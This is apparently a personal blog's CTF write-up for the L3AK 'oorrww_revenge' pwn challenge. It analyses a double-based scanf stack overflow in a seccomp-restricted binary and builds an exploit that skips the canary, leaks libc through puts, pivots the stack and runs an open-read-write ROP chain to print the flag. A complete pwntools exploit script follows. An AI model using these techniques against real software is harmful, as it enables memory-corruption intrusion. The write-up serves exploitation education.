🔻 ihuomtia's blog

Search

SearchSearch

L3AK CTF [PWN] oorrww_revenge

May 27, 20246 min read

This challenge is similar to oorrww challenge, with a slight difference is that we no longer have leaks, so we have to find another way.

Description

Analysis

We are presented with 64bit linux binary:

$ file oorrww_revenge  
oorrww_revenge: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=ca89743989043e941c0194d  
9f5d883cda1160013, for GNU/Linux 3.2.0, not stripped

This time PIE is disabled:

$ pwn checksec --file ./oorrww_revenge  
   Arch:     amd64-64-little  
   RELRO:    Full RELRO  
   Stack:    Canary found  
   NX:       NX enabled  
   PIE:      No PIE (0x400000)

The main function seems to have been modified too, we have now a larger buffer (240 bytes) in comparison to the previous challenge (which had 176 bytes), so this means we could use a larger payload.

undefined8 main(EVP_PKEY_CTX *param_1){
  long in_FS_OFFSET;
  int i;
  undefined buffer [152];
  long canary;
  
  canary = *(long *)(in_FS_OFFSET + 0x28);
  init(param_1);
  sandbox();
  gifts();
  for (i = 0; i < 0x1e; i = i + 1) {
    puts("input:");
    __isoc99_scanf(&%lf,buffer + (i << 3));
  }
  if (canary != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}

And there’s no gifts :(

void gifts(void) {
  puts("oops! no more gift this time");
  return;
}

Checking seccomp, we notice that there’s no difference from the previous challenge.

$ seccomp-tools dump ./oorrww_revenge  
line  CODE  JT   JF      K  
=================================  
0000: 0x20 0x00 0x00 0x00000004  A = arch  
0001: 0x15 0x00 0x06 0xc000003e  if (A != ARCH_X86_64) goto 0008  
0002: 0x20 0x00 0x00 0x00000000  A = sys_number  
0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005  
0004: 0x15 0x00 0x03 0xffffffff  if (A != 0xffffffff) goto 0008  
0005: 0x15 0x02 0x00 0x0000003b  if (A == execve) goto 0008  
0006: 0x15 0x01 0x00 0x00000142  if (A == execveat) goto 0008  
0007: 0x06 0x00 0x00 0x7fff0000  return ALLOW  
0008: 0x06 0x00 0x00 0x00000000  return KILL

Solution

Same thing as before, the main function reads a sequence 8 bytes from stdin in double (float) format into the buffer, but it reads more than the size of the buffer, which results in a buffer overflow vulnerability, now it reads more bytes than the previous challenge.

// this snippet is simplified
char buffer [152];
for (i = 0; i < 0x1e; i = i + 1) {
    puts("input:");
    scanf("%lf",buffer + (i << 3));
}

First we’ll setup helper functions :

def double2long(a):
    packed = struct.pack('d', a)
    unpacked = struct.unpack('q', packed)[0]
    return unpacked
 
def long2double(a):
    packed = struct.pack('q', a)
    unpacked = struct.unpack('d', packed)[0]
    return unpacked
 
def send_buffer(buffer):
    io.recvuntil(b'input:')
    io.sendline(buffer)
 
def send_address(address):
    send_buffer(f"{long2double(address)}".encode())

Lets pad the buffer, to reach the canary and RBP:

## padding
for i in range(0, 19):
    send_address(0)

We’ll now send instructions that’ll leak the address of puts function, which then we can use to calculate the libc base address, as always we’ll skip writing over the canary by sending - just like in the previous writeup, once we leak the addresses we call main function to do more exploiting.

## leak address
send_buffer(b'-') # canary
send_address(0xdeadbeff)
send_address(POP_RAX_RET)
send_address(elf.got['puts'])
send_address(MOV_EAX_RDI_PUTS)
send_buffer(b'-')
send_address(RET)
send_address(elf.symbols['main'])

We got libc base address:

## libc address
leak = u64(io.recvuntil(b'gift').split(b'\n')[1].ljust(8, b'\x00'))
libc.address = leak - libc.symbols['puts']
log.success(f"Got libc address: 0x{libc.address:x}")

As the function main has been recalled, we’ll do the padding again:

## padding
for i in range(0, 19):
    send_address(0)

We’ll have to write into a known address, unlike the previous challenge we don’t have the address of the buffer were writing into, so we’ll have to take a known writable address from the binary (remember that PIE is disabled), we’ll use this address then and setup a ROP chain to call read, and then we’ll do a stack pivot to set the new location as our stack.

send_buffer(b'-') # canary
send_address(WRITTABLE+8) # rbp
send_address(libc.address + POP_RDI_RET)
send_address(0) # stdin
send_address(libc.address + POP_RSI_RET)
send_address(WRITTABLE)
send_address(libc.address + POP_RDX_RBX_RET)
send_address(0x100)
send_address(0) # rbx
send_address(libc.symbols['read'])
send_address(LEAVE_RET) # move rbp to rsp

Now with this setup, we can use a similar payload as the previous challenge, to ORW the flag.

payload = flat([
    # store "flag.txt" in memory
    0x7478742e67616c66,
    0x0,
 
    # opening "flag.txt" in reading mode
    libc.address + MOV_RAX_2,
    libc.address + POP_RDI_RET,
    WRITTABLE,
    libc.address + POP_RSI_RET,
    0,
    libc.address + SYSCALL,
 
    # reading 0x40 bytes from "flag.txt"
    libc.address + POP_RDX_RBX_RET,
    0x40,
    0,
    libc.address + POP_RDI_RET,
    3, # we assumed that this is the file descriptor stored in rax
    libc.address + XOR_RAX,
    libc.address + POP_RSI_RET,
    WRITTABLE + 0x100,
    libc.address + SYSCALL,
 
    # writing to stdout
    libc.address + MOV_RAX_1, # write
    libc.address + POP_RDI_RET,
    0x1, # stdout
    libc.address + SYSCALL,
    ])
 
io.sendline(payload)

Running the exploit, we obtain the flag:

$ python exploit.py                      
[+] Starting local process './oorrww_revenge': pid 342681  
[+] Got libc address: 0x7b7112600000  
[+] Flag: b'L3AK{n0w_u_hav3_th3_k3y_t0_th3_inv1s1ble_ffllaagg}'  
[*] Stopped process './oorrww_revenge_patched' (pid 342681)

Full script

from pwn import *
import struct
 
def start(argv=[], *a, **kw):
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:
        return process([exe] + argv, *a, **kw)
 
# -------------------------------- initial configurations
gdbscript = '''
init-pwndbg
set debuginfod enabled off
'''.format(**locals())
 
exe = './oorrww_revenge'
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
libc = ELF("./libc.so.6", checksec=False)
 
io = start()
 
# -------------------------------- custom functions
 
def double2long(a):
    packed = struct.pack('d', a)
    unpacked = struct.unpack('q', packed)[0]
    return unpacked
 
def long2double(a):
    packed = struct.pack('q', a)
    unpacked = struct.unpack('d', packed)[0]
    return unpacked
 
def send_buffer(buffer):
    io.recvuntil(b'input:')
    io.sendline(buffer)
 
def send_address(address):
    send_buffer(f"{long2double(address)}".encode())
 
# -------------------------------- payload
 
## gadgets in binary
POP_RAX_RET = 0x0000000000401203 # pop rax; ret;
MOV_EAX_RDI_PUTS = 0x00000000004012da # mov rdi, rax; call 0x10c0; nop; pop rbp; ret;
LEAVE_RET = 0x00000000004012c9 # leave; ret;
RET = 0x000000000040101a # ret;
 
## gadgets in libc
POP_RDI_RET = 0x000000000002a3e5 # pop rdi; ret;
POP_RSI_RET = 0x000000000002be51 # pop rsi; ret;
SYSCALL = 0x0000000000091316 # syscall; ret;
POP_RDX_RBX_RET = 0x00000000000904a9 # pop rdx; pop rbx; ret;
MOV_RAX_2 = 0x00000000000d8380 # mov rax, 2; ret;
MOV_RAX_1 = 0x00000000000d8370 # mov rax, 1; ret;
MOV_RDI_RSI_ETC = 0x00000000001a24fe # mov rdi, rsi; and eax, 0x11111111; bsr eax, eax; lea rax, [rdi + rax - 0x20]; vzeroupper; ret;
XOR_RAX = 0x00000000000baaf9 # xor rax, rax; ret;
 
 
## known writable location where the payload will be stored
WRITTABLE= 0x404000
 
# -------------------------------- run exploit
 
## padding
for i in range(0, 19):
    send_address(0)
 
## leak address
send_buffer(b'-') # canary
send_address(0xdeadbeff)
send_address(POP_RAX_RET)
send_address(elf.got['puts'])
send_address(MOV_EAX_RDI_PUTS)
send_buffer(b'-')
send_address(RET)
send_address(elf.symbols['main'])
 
## padding
for i in range(3):
    send_address(0xdeadbe00 + i)
 
## libc address
leak = u64(io.recvuntil(b'gift').split(b'\n')[1].ljust(8, b'\x00'))
libc.address = leak - libc.symbols['puts']
log.success(f"Got libc address: 0x{libc.address:x}")
 
## padding
for i in range(0, 19):
    send_address(0)
 
send_buffer(b'-') # canary
send_address(WRITTABLE+8) # rbp
send_address(libc.address + POP_RDI_RET)
send_address(0) # stdin
send_address(libc.address + POP_RSI_RET)
send_address(WRITTABLE)
send_address(libc.address + POP_RDX_RBX_RET)
send_address(0x100)
send_address(0) # rbx
send_address(libc.symbols['read'])
send_address(LEAVE_RET) # move rbp to rsp
 
sleep(1)
 
payload = flat([
    # store "flag.txt" in memory
    0x7478742e67616c66,
    0x0,
 
    # opening "flag.txt" in reading mode
    libc.address + MOV_RAX_2,
    libc.address + POP_RDI_RET,
    WRITTABLE,
    libc.address + POP_RSI_RET,
    0,
    libc.address + SYSCALL,
 
    # reading 0x40 bytes from "flag.txt"
    libc.address + POP_RDX_RBX_RET,
    0x40,
    0,
    libc.address + POP_RDI_RET,
    3, # we assumed that this is the file descriptor stored in rax
    libc.address + XOR_RAX,
    libc.address + POP_RSI_RET,
    WRITTABLE + 0x100,
    libc.address + SYSCALL,
 
    # writing to stdout
    libc.address + MOV_RAX_1, # write
    libc.address + POP_RDI_RET,
    0x1, # stdout
    libc.address + SYSCALL,
    ])
 
io.sendline(payload)
 
## getting the flag
output = io.clean().strip()
log.success(f"Flag: {output[:output.index(b'}')+1]}")